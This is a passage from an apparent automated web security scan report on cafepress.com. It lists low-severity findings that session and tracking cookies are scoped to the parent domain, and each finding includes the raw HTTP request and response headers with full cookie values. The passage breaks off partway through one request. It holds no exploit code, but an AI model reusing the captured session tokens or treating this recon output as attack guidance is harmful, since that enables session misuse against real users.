<head>
<meta h...[SNIP]...
2.22. http://www.cafepress.com/+journals
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59322
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.23. http://www.cafepress.com/+keepsake_boxes
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59018
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.24. http://www.cafepress.com/+license_plate_frames
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59931
Date: Sun, 26 Dec 2010 13:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.25. http://www.cafepress.com/+magnets
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59159
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.26. http://www.cafepress.com/+mousepads
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 56857
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.27. http://www.cafepress.com/+mugs
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 60077
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.28. http://www.cafepress.com/+ornaments
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+ornaments
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 